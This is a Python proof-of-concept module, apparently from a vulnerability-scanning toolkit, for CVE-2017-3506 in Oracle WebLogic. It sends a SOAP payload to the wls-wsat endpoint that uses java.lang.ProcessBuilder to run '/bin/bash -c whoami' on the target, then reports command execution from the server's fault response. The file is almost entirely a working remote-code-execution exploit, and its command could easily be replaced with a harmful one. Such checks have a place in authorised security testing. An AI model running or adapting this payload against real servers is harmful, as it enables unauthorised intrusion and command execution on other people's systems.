'''
Function:
    CVE-2017-3506
Author:
    花果山
Wechat official account：
    中龙 红客突击队
Official website：
    https://www.hscsec.cn/
Email：
    spmonkey@hscsec.cn
Blog:
    https://spmonkey.github.io/
GitHub:
    https://github.com/spmonkey/
'''
# -*- coding: utf-8 -*-
import requests
import os
import sys
from urllib.parse import urlparse
from requests.packages.urllib3 import disable_warnings
disable_warnings()
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(path)
from modules import get_user_agent


class poc:
    def __init__(self, url, proxies):
        self.url = url
        self.headers = {
            'User-Agent': get_user_agent.get_user_agent(),
        }
        self.value_list = []
        self.result_text = ""
        self.proxies = proxies

    def host(self):
        url = urlparse(self.url)
        netloc = url.netloc
        scheme = url.scheme
        return scheme, netloc

    def vuln(self, netloc, scheme):
        url = "{}://{}/wls-wsat/CoordinatorPortType".format(scheme, netloc)
        data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">\n      <soapenv:Header>\n        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">\n          <java>\n            <object class="java.lang.ProcessBuilder">\n              <array class="java.lang.String" length="3">\n                <void index="0">\n                  <string>/bin/bash</string>\n                </void>\n                <void index="1">\n                  <string>-c</string>\n                </void>\n                                <void index="2">\n                  <string>whoami</string>\n                </void>\n              </array>\n              <void method="start"/>\n            </object>\n          </java>\n        </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n    </soapenv:Envelope>'''
        try:
            result = requests.post(url=url, data=data, headers=self.headers, verify=False, proxies=self.proxies)
            if '<faultstring>java.lang.ProcessBuilder' in result.text or "<faultstring>0" in result.text:
                target = urlparse(url)
                self.result_text += """\n        [+]    \033[32m检测到目标站点存在任意命令执行漏洞 (CVE-2017-3506)\033[0m
                 POST {} HTTP/1.1
                 Host: {}""".format(target.path, target.netloc)
                for request_type, request_text in dict(result.request.headers).items():
                    self.result_text += "\n                 {}: {}".format(request_type, request_text)
                self.result_text += "\n"
                for i in data.split("\n"):
                    self.result_text += "\n                 {}".format(i)
                return True
            else:
                return False
        except:
            return False

    def main(self):
        all = self.host()
        scheme = all[0]
        netloc = all[1]
        if self.vuln(netloc, scheme):
             return self.result_text
        else:
            return False
